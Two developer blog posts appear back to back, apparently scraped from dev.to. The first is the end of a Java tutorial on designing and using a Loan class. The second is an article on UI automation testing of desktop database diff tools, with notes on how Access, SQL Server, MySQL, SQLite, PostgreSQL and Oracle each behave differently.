As another example, consider getting a loan. A specific loan can be viewed as an object of a **Loan** class. The interest rate, loan amount, and loan period are its data properties, and computing the monthly payment and total payment are its methods. When you buy a car, a loan object is created by instantiating the class with your loan interest rate, loan amount, and loan period. You can then use the methods to find the monthly payment and total payment of your loan. As a user of the **Loan** class, you don’t need to know how these methods are implemented.
ComputeLoan.java, [here](https://dev.to/paulike/software-development-process-1lb9) presented a program for computing loan payments. That
program cannot be reused in other programs because the code for computing the payments is in the **main** method. One way to fix this problem is to define static methods for computing the monthly payment and total payment. However, this solution has limitations. Suppose you wish to associate a date with the loan. There is no good way to tie a date with a loan without using objects. The traditional procedural programming paradigm is action-driven, and data are separated from actions. The object-oriented programming paradigm focuses on objects, and actions are defined along with the data in objects. To tie a date with a loan, you can define a loan class with a date along with the loan’s other properties as data fields. A loan object now contains data and actions for manipulating and processing data, and the loan data and actions are integrated in one object. Figure below shows the UML class diagram for the **Loan** class.

The UML diagram in Figure above serves as the contract for the **Loan** class. Throughout this book, you will play the roles of both class user and class developer. Remember that a class user can use the class without knowing how the class is implemented. Assume that the **Loan** class is available. The program below uses that class.

`Enter annual interest rate, for example, 8.25: 2.5
Enter number of years as an integer: 5
Enter loan amount, for example, 120000.95: 1000
The loan was created on Sat Jun 16 21:12:50 EDT 2012
The monthly payment is 17.75
The total payment is 1064.84`
The **main** method reads the interest rate, the payment period (in years), and the loan amount; creates a **Loan** object; and then obtains the monthly payment (line 26) and the total payment (line 26) using the instance methods in the **Loan** class. The **Loan** class can be implemented as in below.
```
package demo;
public class Loan {
private double annualInterestRate;
private int numberOfYears;
private double loanAmount;
private java.util.Date loanDate;
/** Default constructor */
public Loan() {
this(2.5, 1, 1000);
}
/** Construct a loan with specified annual interest rate, number of years, and loan amount */
public Loan(double annualInterestRate, int numberOfYears, double loanAmount) {
this.annualInterestRate = annualInterestRate;
this.numberOfYears = numberOfYears;
this.loanAmount = loanAmount;
loanDate = new java.util.Date();
}
/** Returns annualInterestRate */
public double getAnnualInterestRate() {
return annualInterestRate;
}
/** Set a new annualInterestRate */
public void setAnnualInterestRate(double annualInterestRate) {
this.annualInterestRate = annualInterestRate;
}
/** Return numberOfYears */
public int getNumberOfYears() {
return numberOfYears;
}
/** Set a new numberOFYears */
public void setNumberOfYears(int numberOfYears) {
this.numberOfYears = numberOfYears;
}
/** Return loanAmount */
public double getLoanAmount() {
return loanAmount;
}
/** Set a new loanAmount */
public void setLoanAmount(double loanAmount) {
this.loanAmount = loanAmount;
}
/** Return loanDate */
public java.util.Date getLoanDate() {
return loanDate;
}
/** Find monthly payment */
public double getMonthlyPayment() {
double monthlyInterestRate = annualInterestRate / 1200;
double monthlyPayment = loanAmount * monthlyInterestRate / (1 - (1 / Math.pow(1 + monthlyInterestRate, numberOfYears * 12)));
return monthlyPayment;
}
/** Find total payment */
public double getTotalPayment() {
double totalPayment = getMonthlyPayment() * numberOfYears * 12;
return totalPayment;
}
}
```
From a class developer’s perspective, a class is designed for use by many different customers. In order to be useful in a wide range of applications, a class should provide a variety of ways for customization through constructors, properties, and methods.
The **Loan** class contains two constructors, four getter methods, three setter methods, and the methods for finding the monthly payment and the total payment. You can construct a **Loan** object by using the no-arg constructor or the constructor with three parameters: annual interest rate, number of years, and loan amount. When a loan object is created, its date is stored in the **loanDate** field. The **getLoanDate** method returns the date. The methods—**getAnnualInterest**, **getNumberOfYears**, and **getLoanAmount**—return the annual interest rate, payment years, and loan amount, respectively. All the data properties and methods in this class are tied to a specific instance of the **Loan** class. Therefore, they are instance variables and methods.
Use the UML diagram for the **Loan** class to write a test program that uses the **Loan** class even though you don’t know how the **Loan** class is implemented. This has three benefits:
- It demonstrates that developing a class and using a class are two separate tasks.
- It enables you to skip the complex implementation of certain classes without interrupting the sequence of this book.
- It is easier to learn how to implement a class if you are familiar with it by using the class.
For all the class examples from now on, create an object from the class and try using its methods before turning your attention to its implementation. | paulike |
1,878,072 | Implementing UI Automation Testing for Desktop Applications Dealing With Different DBMS | This article can be useful for: Those who participate in UI automation testing of desktop... | 0 | 2024-06-05T20:22:39 | https://dev.to/konstantin_semenenkov/implementing-ui-automation-testing-for-desktop-applications-dealing-with-different-dbms-1fkg | testing, database, sql, dotnet | ## This article can be useful for:
- Those who participate in UI automation testing of desktop apps. Perhaps someone will be interested in the real experience of building a testing system.
- Someone who is making software that needs to use different relational database management systems (DBMSs).
## A brief history of the topic
Just a few words about the [project](https://ksdbmerge.tools/) discussed here. This section does not contain any technical details, so it can be skipped if you're in a hurry. The only technical information in this section is the list of DBMSs related to our discussion.
The project is a number of diff and merge tools for popular relational DBMSs. Initially created for internal use in Access development, it was primarily used to compare module and form code between different versions of the same Access project. Later, a fork was made for SQL Server, using the same UI to compare schema, data, and programming stuff. Further forks were developed for MySQL, SQLite, and PostgreSQL. With tools for working with metadata from different DBMSs, a tool was created for Cross-DBMS scenarios, focusing mainly on data. Having created a tool for Cross-DBMS, I realized that it sorely lacks Oracle support. Thus, for Cross-DBMS a kernel for working with Oracle was implemented, along with a separate tool for Oracle Database.
All tools are made using Visual Studio Community Edition and utilize the .NET Framework and WPF.
## About the tests
After one of the disastrous releases, where changes in one area unexpectedly broke another, it became clear that UI automation tests were necessary. Although there were unit tests for some components, they did not check the functionality of the entire application. Manually testing all the functionality of each release would be too time-consuming, and besides, humans (at least I) are lazy and can make mistakes. If it can be automated, then it should be automated. The first tests were built using the [TestStack.White](https://github.com/TestStack/White) library. Now, since this library is no longer supported, there is a smooth migration to the [FlaUI](https://github.com/FlaUI/FlaUI) library.
It was decided to use the [SpecFlow](https://specflow.org/) BDD framework, which conveniently describes the steps for using the application and the expected results. A typical test looks like this:
```
Scenario: 01 Sample data diff test
Given [System] Set template folder to '04_DataDiff'
And [App] Start with 'dd1;dd2' loaded
When [HomeTab] Click on the 'left' panel summary 'Total' for 'Table definitions'
And [ObjectList] On the 'left' panel click on 'Compare data (all records)' for 'Client'
Then [DataDiff] 'right' panel totals is '2;0;1;1', per page '2;0;1;1'
```
For each step, code is written that uses the UI automation library to check and manipulate the UI. However, over time, there was a complication with parameterized tests, where the same steps needed to be used for different cases. SpecFlow allows describing parameterized tests using Scenario Outline, where each case is described by a single row in the Examples table. Thus, for one case, we can only a set of scalar values. However, this was insufficient to describe the expected result of a complex UI consisting of multiple grids, each needing to be described by a separate table. For such tests, another approach was developed: each case is described by a row in an Excel table, with columns describing the actions and the expected UI state. Since an Excel cell can contain multiline text, a special syntax was adopted to describe multiple UI grids in one cell, for example:
```
[Columns (Name; Nullability)]
- id; NOT NULL
- name; NULL
[Constraints (Type; Columns)]
- PRIMARY KEY; id
```
From a one-dimensional list of parameters in SpecFlow, we moved to a four-dimensional set of parameters: a set of Excel cells, each containing a set of tables, with each table being a set of rows and columns. Using Excel or its alternatives is convenient as there are ready-to-use tools for viewing and editing. But there are significant drawbacks associated with the xlsx file format, such as difficulty tracking test history, comparing them, and understanding the volume of existing tests. Therefore, in the future, these scenarios are planned to be moved from Excel to some text format, most likely XML, requiring the development of a UI for editing these scenarios.
A typical test proceeds as follows:
1. Prepare one or two database instances. Only one instance is used if the test checks the application's behavior when only one database is opened, or when the same database is compared to itself. In most cases, databases are described as scripts. For tests described using Excel, the script is assembled from spreadsheet content on the fly. For applications working with Access or SQLite, ready-made DB files are sometimes used instead of scripts. Specifically for Access, not all database objects can be created with an SQL script, even when only dealing with tables. For SQLite, ready-made files are used to perform a more complete end-to-end testing cycle, which is particularly important for protected files.
Where possible:
- Databases are created in parallel to speed up the process.
- Database files are created on a RAM Drive, sometimes with the entire database server placed there. Using a RAM Drive not only speeds up test execution but also prolongs the life of SSDs or HDDs.
2. The application is launched and opens the databases. If possible, and if not crucial for the test, specifying the database is done via the command line to save time clicking through database open dialogs.
3. The test clicks through the application and checks UI elements according to the scenario steps. When the application generates and executes SQL scripts, the text of these scripts is extracted and goes to the output of the test execution console. This often helping to understand the problem without debugging the test.
4. If the test fails, a screenshot of the application is saved.
5. The application is closed, and the databases are deleted. In the most cases database deletion occurs in the background, saving some time. Deletion is controlled by a switch; sometimes databases are retained for further analysis and debugging. Tests for AccdbMerge also check for any non-closed Access processes, which are used by the application to process database files.
Steps 1 and 2 can take significant time. Creating one database with two tables for two different cases and launching the application once can be significantly faster than creating a database with one table twice and launching the application twice (once for each database). Therefore, some cases are combined, if possible, so that one database is created for all cases, and the application is launched only once.
## DBMS-specific things
All of the listed relational DBMSs deal with tables; tables consist of columns and rows. SQL is everywhere. It would seem that I can easily take some existing test from one application and use it for another. Fortunately, sometimes this is almost possible. If a new feature is being developed, which is subsequently planned to be implemented in tools for different DBMSs, then the test for it is usually written first for SQLite, since these tests are the fastest. Often such a test and scripts for it can be reused for other products with minimal changes. But, as we know, the devil is in the details. Different data types, different database management capabilities, different SQL. As a result, the tests still have significant differences. Let's talk about them. The following will list the features for each DBMS separately, in the order these tests were created.
## Microsoft Access
Possibly the biggest issue for my tests is the limited SQL in Access, both for DDL and DML. Access has Queries similar to Views in other DBMS, and there is a CREATE VIEW statement described in the documentation, but [it does not work](https://stackoverflow.com/questions/11367959/create-view-in-ms-access-2007). There are many data types that cannot be used either in CREATE TABLE or INSERT. As a result, using a script, you can create a database file with tables using simple data types like numbers or strings. But for something more complex, pre-prepared mdb and accdb files often have to be used. However, even if we have prepared database templates, sometimes simply copying them is not enough. A common practice in Access development is to split the database into a backend and frontend, resulting in linked tables in the frontend that need to update their links to the backend after copying.
Another problem with interacting with Access is that it updates from time to time, causing some tests to stop working. My application stops working even though nothing has changed in it — only Access has changed. They have [broken](https://techcommunity.microsoft.com/t5/access-blog/breaking-ace-out-of-the-bubble/bc-p/2606712/highlight/true#M213) [twice](https://techcommunity.microsoft.com/t5/access-blog/breaking-ace-out-of-the-bubble/bc-p/3641817/highlight/true#M289) the availability of DAO libraries from the outside.
The most frequent support request I receive is that AccdbMerge cannot connect to Access, which is always fixed only by restoring Office, without changing anything in AccdbMerge.
## SQL Server
I started my programming career in the early 2000s, and SQL Server was the first database engine I worked with. So, SQL Server is a sort of standard DBMS for me, and for a long time, all other DBMSs were learned through comparison with SQL Server.
Perhaps the most interesting result of making tests for SQL Server was some incompatibility with .NET data types:
- The SQL Server **decimal** data type can exceed the capacity of the .NET **decimal** data type
- The SQL Server **uniqueidentifier** and the .NET **Guid** [have different internal presentation and sorting rules](https://learn.microsoft.com/en-us/dotnet/framework/data/adonet/sql/comparing-guid-and-uniqueidentifier-values).
## MySQL and MariaDB
The main problem for me during my work on these tools was the frequency of new releases of these DBMSs, each new release needs to be checked for compatibility with the application. At first, this mostly concerned MariaDB; MySQL stayed on version 8.0 for a long time. However, it recently released versions 8.1 to 8.4 within a short interval.
From my experience working with different DBMSs, MySQL ranks second after Access in terms of the number of bugs. And sometimes they don't get fixed for years. One example, which in particular is one of the reasons for the differences between tests, is non-working inline foreign keys. There are a lot of questions on this topic on StackOverflow and [one of them](https://stackoverflow.com/questions/24313143/mysql-how-to-declare-foreign-key-inline) contains links to a bunch of related bugs in MySQL.
## SQLite
SQLite has several specific features, but the most distinctive for my tools and their tests is handling of data types. Not only can it simply be missing, but even if they are specified, by default you can easily put the value of the different data type. Fortunately, version 3.37.0 introduced the concept of STRICT tables to fix this, but it does not eliminate the need to maintain regular tables.
The [compatibility](https://www.sqlite.org/formatchng.html) between database files and library versions is admirable. However, knowing about this super-compatibility, it was doubly strange to face [the end of support](https://sqlite.org/forum/forumpost/d2c637bafbbff69d) for one of the methods for protecting database files.
## PostgreSQL
Similar to SQL Server, I did not have any significant issues with PostgreSQL. The main difficulty from a development point of view was the huge number of data types and a wide variety of types of database objects and their properties. And it was new to me to met NaN and +/- infinity values for some numeric and timestamp data types.
## Oracle
As mentioned earlier, before running the test, we must first create a database. For SQL Server, MySQL, and PostgreSQL, this is simply done by sending the CREATE DATABASE command to the database server. But not for Oracle. It doesn't work there. You have the database server - and that's your database. And don't ask for another one. Instead of a database, I had to create a user which is created with a new schema. Then the test interacts with objects within this schema. Since the schema name is displayed in the application as part of the table name, and this schema is different each time, special variables had to be entered and processed. For other DBMS tests, the table is referred to as TableName or dbo.TableName or public.TableName, and this is the real name of the object. But for Oracle tests, I had to write $schema.TABLENAME and then in the code replace $schema with the real name of the schema before looking for this one object on the application UI. At first, I thought that maybe I just didn’t know something about Oracle, but then I came across the source code of one of the DB Fiddles - its authors did the same thing.
Another feature of Oracle is that an empty string is always treated as NULL. Unlike any other DBMS, it is impossible to save an empty string as non-NULL.
I use Windows, and all my desktop apps work only on Windows. Another feature of working with Oracle was the need to use Docker Desktop since I could not find a Windows version for the latest versions of Oracle.
## Other
In addition to the listed differences, there are several more points that are specific to each DBMS:
1. Case-sensitivity and quoted identifiers work differently for object names. Some DBMSs will leave the CamelCase object name as is, others will convert it to lowercase, and others to uppercase. For some DBMSs, CamelCase can be preserved if you surround the name with double quotes, but double quotes are not used by all DBMSs. MySQL and MariaDB use grave accents (`), and SQL Server (by default) and Access use square brackets ([]).
2. Creating database objects takes time, and sometimes it can be speeded up if you wrap all statements in a transaction. However, not every DBMS supports transactions for DDL statements. Additionally, some DDL commands sometimes cannot be used together with others and must be sent to the DBMS server as a separate request.
3. When filling tables with data, it is convenient to use multi-row INSERT statements like this:
```
INSERT INTO TableName
(ID, Name)
VALUES
(1, 'Smith'),
(2, 'Doe')
```
But this syntax is not supported by all DBMSs, or some DBMSs may not support it for all versions. In order for the test to work on all the required DBMS versions, we have to split the script into separate INSERTs.
## Summary
In this article, we discussed the practical experience of building a UI automation testing system for desktop applications that interact with various relational DBMSs. The necessity of automated UI testing became evident after a release highlighted the risks of manual testing. Each DBMS presented unique challenges, from Access's limited SQL capabilities and frequent updates to Oracle's unconventional database creation requirements. The experience highlighted the importance of flexibility and adaptability in automated testing to accommodate the nuances of different DBMSs.
## P. S.
According to the publishing rules, I have to note that I have used AI for title, summary and proofreading of the rest of the text. But the text itself was handwritten, including the SQL for the cover image :).
| konstantin_semenenkov |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.